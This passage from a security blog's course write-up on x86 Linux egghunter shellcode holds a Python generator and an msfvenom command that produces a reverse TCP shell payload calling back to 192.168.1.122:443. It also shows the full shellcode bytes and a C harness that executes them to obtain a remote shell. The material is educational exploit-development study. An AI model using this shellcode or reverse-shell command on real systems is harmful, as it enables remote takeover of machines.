    <span class="s">"</span><span class="se">\\</span><span class="s">x31</span><span class="se">\\</span><span class="s">xd2</span><span class="se">\\</span><span class="s">x66</span><span class="se">\\</span><span class="s">x81</span><span class="se">\\</span><span class="s">xca</span><span class="se">\\</span><span class="s">xff</span><span class="se">\\</span><span class="s">x0f</span><span class="se">\\</span><span class="s">x42</span><span class="se">\\</span><span class="s">x8d</span><span class="se">\\</span><span class="s">x5a</span><span class="se">\\</span><span class="s">x04</span><span class="se">\\</span><span class="s">x6a</span><span class="se">\\</span><span class="s">x21</span><span class="se">\\</span><span class="s">x58</span><span class="se">\\</span><span class="s">xcd</span><span class="se">\\</span><span class="s">x80</span><span class="se">\\</span><span class="s">x3c</span><span class="se">\\</span><span class="s">xf2</span><span class="se">\\</span><span class="s">x74</span><span class="se">\\</span><span class="s">xee</span><span class="se">\\</span><span class="s">xb8"</span>
    <span class="o">+</span> <span class="n">to_hex</span><span class="p">(</span><span class="n">options</span><span class="p">.</span><span class="n">egg</span><span class="p">)</span>
    <span class="o">+</span> <span class="s">"</span><span class="se">\\</span><span class="s">x89</span><span class="se">\\</span><span class="s">xd7</span><span class="se">\\</span><span class="s">xaf</span><span class="se">\\</span><span class="s">x75</span><span class="se">\\</span><span class="s">xe9</span><span class="se">\\</span><span class="s">xaf</span><span class="se">\\</span><span class="s">x75</span><span class="se">\\</span><span class="s">xe6</span><span class="se">\\</span><span class="s">xff</span><span class="se">\\</span><span class="s">xe7"</span><span class="p">)</span>

<span class="n">payload</span> <span class="o">=</span> <span class="p">(</span><span class="n">to_hex</span><span class="p">(</span><span class="n">options</span><span class="p">.</span><span class="n">egg</span><span class="p">)</span> <span class="o">+</span> <span class="n">to_hex</span><span class="p">(</span><span class="n">options</span><span class="p">.</span><span class="n">egg</span><span class="p">)</span> <span class="o">+</span> <span class="n">options</span><span class="p">.</span><span class="n">payload</span><span class="p">)</span>

<span class="k">print</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">Egghunter = </span><span class="se">\"</span><span class="s">"</span> <span class="o">+</span> <span class="n">egghunter</span> <span class="o">+</span> <span class="s">"</span><span class="se">\"</span><span class="s">"</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Payload = </span><span class="se">\"</span><span class="s">"</span> <span class="o">+</span> <span class="n">payload</span> <span class="o">+</span> <span class="s">"</span><span class="se">\"\n</span><span class="s">"</span><span class="p">)</span>
</pre></table></code></div></div><h3 id="generating-payload-to-test-script">Generating payload to test script</h3><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre><td class="rouge-code"><pre>root@sengen-kali2:~# msfvenom <span class="nt">-p</span> linux/x86/shell_reverse_tcp <span class="nv">lhost</span><span class="o">=</span>192.168.1.122 <span class="nv">lport</span><span class="o">=</span>443 <span class="nt">-f</span> python
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes
Final size of python file: 342 bytes
buf <span class="o">=</span>  <span class="s2">""</span>
buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">db</span><span class="se">\x</span><span class="s2">f7</span><span class="se">\x</span><span class="s2">e3</span><span class="se">\x</span><span class="s2">53</span><span class="se">\x</span><span class="s2">43</span><span class="se">\x</span><span class="s2">53</span><span class="se">\x</span><span class="s2">6a</span><span class="se">\x</span><span class="s2">02</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">e1</span><span class="se">\x</span><span class="s2">b0</span><span class="se">\x</span><span class="s2">66"</span>
buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">cd</span><span class="se">\x</span><span class="s2">80</span><span class="se">\x</span><span class="s2">93</span><span class="se">\x</span><span class="s2">59</span><span class="se">\x</span><span class="s2">b0</span><span class="se">\x</span><span class="s2">3f</span><span class="se">\x</span><span class="s2">cd</span><span class="se">\x</span><span class="s2">80</span><span class="se">\x</span><span class="s2">49</span><span class="se">\x</span><span class="s2">79</span><span class="se">\x</span><span class="s2">f9</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">c0"</span>
buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">a8</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">7a</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">02</span><span class="se">\x</span><span class="s2">00</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">bb</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">e1</span><span class="se">\x</span><span class="s2">b0</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">50"</span>
buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">51</span><span class="se">\x</span><span class="s2">53</span><span class="se">\x</span><span class="s2">b3</span><span class="se">\x</span><span class="s2">03</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">e1</span><span class="se">\x</span><span class="s2">cd</span><span class="se">\x</span><span class="s2">80</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">6e</span><span class="se">\x</span><span class="s2">2f</span><span class="se">\x</span><span class="s2">73"</span>
buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">2f</span><span class="se">\x</span><span class="s2">2f</span><span class="se">\x</span><span class="s2">62</span><span class="se">\x</span><span class="s2">69</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">e3</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">53</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">e1</span><span class="se">\x</span><span class="s2">b0"</span>
buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">0b</span><span class="se">\x</span><span class="s2">cd</span><span class="se">\x</span><span class="s2">80"</span>
</pre></table></code></div></div><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre><span class="o">[</span>sengen@manjaro-x86 assignment3]<span class="nv">$ </span>python create_egg_hunter.py <span class="nt">-e</span> 90509050 <span class="nt">-p</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">db</span><span class="se">\x</span><span class="s2">f7</span><span class="se">\x</span><span class="s2">e3</span><span class="se">\x</span><span class="s2">53</span><span class="se">\x</span><span class="s2">43</span><span class="se">\x</span><span class="s2">53</span><span class="se">\x</span><span class="s2">6a</span><span class="se">\x</span><span class="s2">02</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">e1</span><span class="se">\x</span><span class="s2">b0</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">cd</span><span class="se">\x</span><span class="s2">80</span><span class="se">\x</span><span class="s2">93</span><span class="se">\x</span><span class="s2">59</span><span class="se">\x</span><span class="s2">b0</span><span class="se">\x</span><span class="s2">3f</span><span class="se">\x</span><span class="s2">cd</span><span class="se">\x</span><span class="s2">80</span><span class="se">\x</span><span class="s2">49</span><span class="se">\x</span><span class="s2">79</span><span class="se">\x</span><span class="s2">f9</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">c0</span><span class="se">\x</span><span class="s2">a8</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">7a</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">02</span><span class="se">\x</span><span class="s2">00</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">bb</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">e1</span><span class="se">\x</span><span class="s2">b0</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">51</span><span class="se">\x</span><span class="s2">53</span><span class="se">\x</span><span class="s2">b3</span><span class="se">\x</span><span class="s2">03</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">e1</span><span class="se">\x</span><span class="s2">cd</span><span class="se">\x</span><span class="s2">80</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">6e</span><span class="se">\x</span><span class="s2">2f</span><span class="se">\x</span><span class="s2">73</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">2f</span><span class="se">\x</span><span class="s2">2f</span><span class="se">\x</span><span class="s2">62</span><span class="se">\x</span><span class="s2">69</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">e3</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">53</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">e1</span><span class="se">\x</span><span class="s2">b0</span><span class="se">\x</span><span class="s2">0b</span><span class="se">\x</span><span class="s2">cd</span><span class="se">\x</span><span class="s2">80"</span>

Egghunter <span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">d2</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">81</span><span class="se">\x</span><span class="s2">ca</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">0f</span><span class="se">\x</span><span class="s2">42</span><span class="se">\x</span><span class="s2">8d</span><span class="se">\x</span><span class="s2">5a</span><span class="se">\x</span><span class="s2">04</span><span class="se">\x</span><span class="s2">6a</span><span class="se">\x</span><span class="s2">21</span><span class="se">\x</span><span class="s2">58</span><span class="se">\x</span><span class="s2">cd</span><span class="se">\x</span><span class="s2">80</span><span class="se">\x</span><span class="s2">3c</span><span class="se">\x</span><span class="s2">f2</span><span class="se">\x</span><span class="s2">74</span><span class="se">\x</span><span class="s2">ee</span><span class="se">\x</span><span class="s2">b8</span><span class="se">\x</span><span class="s2">90</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">90</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">d7</span><span class="se">\x</span><span class="s2">af</span><span class="se">\x</span><span class="s2">75</span><span class="se">\x</span><span class="s2">e9</span><span class="se">\x</span><span class="s2">af</span><span class="se">\x</span><span class="s2">75</span><span class="se">\x</span><span class="s2">e6</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">e7"</span>
Payload <span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">90</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">90</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">90</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">90</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">db</span><span class="se">\x</span><span class="s2">f7</span><span class="se">\x</span><span class="s2">e3</span><span class="se">\x</span><span class="s2">53</span><span class="se">\x</span><span class="s2">43</span><span class="se">\x</span><span class="s2">53</span><span class="se">\x</span><span class="s2">6a</span><span class="se">\x</span><span class="s2">02</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">e1</span><span class="se">\x</span><span class="s2">b0</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">cd</span><span class="se">\x</span><span class="s2">80</span><span class="se">\x</span><span class="s2">93</span><span class="se">\x</span><span class="s2">59</span><span class="se">\x</span><span class="s2">b0</span><span class="se">\x</span><span class="s2">3f</span><span class="se">\x</span><span class="s2">cd</span><span class="se">\x</span><span class="s2">80</span><span class="se">\x</span><span class="s2">49</span><span class="se">\x</span><span class="s2">79</span><span class="se">\x</span><span class="s2">f9</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">c0</span><span class="se">\x</span><span class="s2">a8</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">7a</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">02</span><span class="se">\x</span><span class="s2">00</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">bb</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">e1</span><span class="se">\x</span><span class="s2">b0</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">51</span><span class="se">\x</span><span class="s2">53</span><span class="se">\x</span><span class="s2">b3</span><span class="se">\x</span><span class="s2">03</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">e1</span><span class="se">\x</span><span class="s2">cd</span><span class="se">\x</span><span class="s2">80</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">6e</span><span class="se">\x</span><span class="s2">2f</span><span class="se">\x</span><span class="s2">73</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">2f</span><span class="se">\x</span><span class="s2">2f</span><span class="se">\x</span><span class="s2">62</span><span class="se">\x</span><span class="s2">69</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">e3</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">53</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">e1</span><span class="se">\x</span><span class="s2">b0</span><span class="se">\x</span><span class="s2">0b</span><span class="se">\x</span><span class="s2">cd</span><span class="se">\x</span><span class="s2">80"</span>
</pre></table></code></div></div><h3 id="testing-in-a-c-program">Testing in a C program</h3><p>From the output of our script we can add it to a small C program to execute the egghunter shellcode. Since the payload is also defined as a variable it will be stored somewhere in memory for the egghunter to find.</p><p><code class="language-plaintext highlighter-rouge">[sengen@manjaro-x86 assignment3]$ gcc shellcode.c -o shellcode</code></p><div class="language-c highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre><td class="rouge-code"><pre><span class="cp">#include &lt;string.h&gt;
#include &lt;stdio.h&gt;
</span>
<span class="n">main</span><span class="p">()</span>
<span class="p">{</span>
    <span class="kt">char</span> <span class="n">egghunter</span><span class="p">[]</span> <span class="o">=</span> <span class="s">"</span><span class="se">\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\xcd\x80\x3c\xf2\x74\xee\xb8\x90\x50\x90\x50\x89\xd7\xaf\x75\xe9\xaf\x75\xe6\xff\xe7</span><span class="s">"</span><span class="p">;</span>

    <span class="kt">char</span> <span class="n">payload</span><span class="p">[]</span> <span class="o">=</span> <span class="s">"</span><span class="se">\x90\x50\x90\x50\x90\x50\x90\x50\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0\xa8\x01\x7a\x68\x02\x00\x01\xbb\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80</span><span class="s">"</span><span class="p">;</span>

    <span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">ret</span><span class="p">)()</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">(</span><span class="o">*</span><span class="p">)())</span><span class="n">egghunter</span><span class="p">;</span>
    <span class="n">ret</span><span class="p">();</span>
<span class="p">}</span>
</pre></table></code></div></div><h3 id="gaining-shell">Gaining shell</h3><p><strong>Executing shellcode program that initiates the egghunter</strong><br /> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="https://tdmathison.github.io/assets/img/slae32/03-01.png" /></p><p><strong>Receiving shell on remote Linux machine</strong><br /> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="https://tdmathison.github.io/assets/img/slae32/03-02.png" /></p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/slae32/'>SLAE32</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/assembly/" class="post-tag no-text-decoration" >assembly</a> <a href="/tags/x86/" class="post-tag no-text-decoration" >x86</a> <a href="/tags/penetration-testing/" class="post-tag no-text-decoration" >penetration-testing</a> <a href="/tags/hacking/" class="post-tag no-text-decoration" >hacking</a> <a href="/tags/exploit-development/" class="post-tag no-text-decoration" >exploit-development</a> <a href="/tags/shellcode/" class="post-tag no-text-decoration" >shellcode</a> <a href="/tags/egghunter/" class="post-tag no-text-decoration" >egghunter</a> <a href="/tags/slae32/" class="post-tag no-text-decoration" >slae32</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><!-- Post sharing snippet v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=SLAE32: Implementing an x86/Linux Egghunter - Travis Mathison&url=https://tdmathison.github.io/posts/slae32-3/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=SLAE32: Implementing an x86/Linux Egghunter - Travis Mathison&u=https://tdmathison.github.io/posts/slae32-3/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=SLAE32: Implementing an x86/Linux Egghunter - Travis Mathison&url=https://tdmathison.github.io/posts/slae32-3/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><!-- The Pannel on right side (Desktop views) v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"><h3 data-toc-skip>Recent Update</h3><ul class="post-content pl-0 pb-1 ml-1 mt-2"></ul></div><div id="access-tags"><h3 data-toc-skip>Trending Tags</h3><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/x86/">x86</a> <a class="post-tag" href="/tags/slae32/">slae32</a> <a class="post-tag" href="/tags/shellcode/">shellcode</a> <a class="post-tag" href="/tags/exploit-development/">exploit development</a> <a class="post-tag" href="/tags/assembly/">assembly</a> <a class="post-tag" href="/tags/walkthrough/">walkthrough</a> <a class="post-tag" href="/tags/offensive-security/">offensive security</a> <a class="post-tag" href="/tags/ctf/">ctf</a> <a class="post-tag" href="/tags/windows/">windows</a> <a class="post-tag" href="/tags/script/">script</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><h3 data-toc-skip class="pl-3 pt-2 mb-2">Contents</h3><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <!-- Recommend the other 3 posts according to the tags and categories of the current post, if the number is not enough, use the other latest posts to supplement. v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/slae32-1/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Jan 2, 2018 <i class="unloaded">2018-01-02T20:00:00-08:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>SLAE32: Creating TCP Bind Shellcode</h3><div class="text-muted small"><p> The blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-e...</p></div></div></a></div><div class="card"> <a href="/posts/slae32-2/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Jan 3, 2018 <i class="unloaded">2018-01-03T20:00:00-08:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>SLAE32: Creating Reverse TCP Shellcode</h3><div class="text-muted small"><p> The blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-e...</p></div></div></a></div><div class="card"> <a href="/posts/slae32-4/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Jan 18, 2018 <i class="unloaded">2018-01-18T20:00:00-08:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>SLAE32: Creation of custom encoding scheme</h3><div class="text-muted small"><p> The blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-e...</p></div></div></a></div></div></div><!-- Navigation buttons at the bottom of the post. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --><div class="post-navigation d-flex justify-content-between"> <a href="/posts/slae32-2/" class="btn btn-outline-primary"><p>SLAE32: Creating Reverse TCP Shellcode</p></a> <a href="/posts/slae32-4/" class="btn btn-outline-primary"><p>SLAE32: Creation of custom encoding scheme</p></a></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('#post-wrapper img'); const observer = lozad(imgs); observer.observe(); </script> <!-- The Footer v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2020 <a href="https://github.com/tdmathison">Travis Mathison</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy/">Chirpy</a> theme.</p></div></div></footer></div><!-- The Search results v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/x86/">x86</a> <a class="post-tag" href="/tags/slae32/">slae32</a> <a class="post-tag" href="/tags/shellcode/">shellcode</a> <a class="post-tag" href="/tags/exploit-development/">exploit development</a> <a class="post-tag" href="/tags/assembly/">assembly</a> <a class="post-tag" href="/tags/walkthrough/">walkthrough</a> <a class="post-tag" href="/tags/offensive-security/">offensive security</a> <a class="post-tag" href="/tags/ctf/">ctf</a> <a class="post-tag" href="/tags/windows/">windows</a> <a class="post-tag" href="/tags/script/">script</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <!-- The GA snippet v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', '', 'auto'); ga('send', 'pageview'); </script> <!-- Jekyll Simple Search loader v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://tdmathison.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
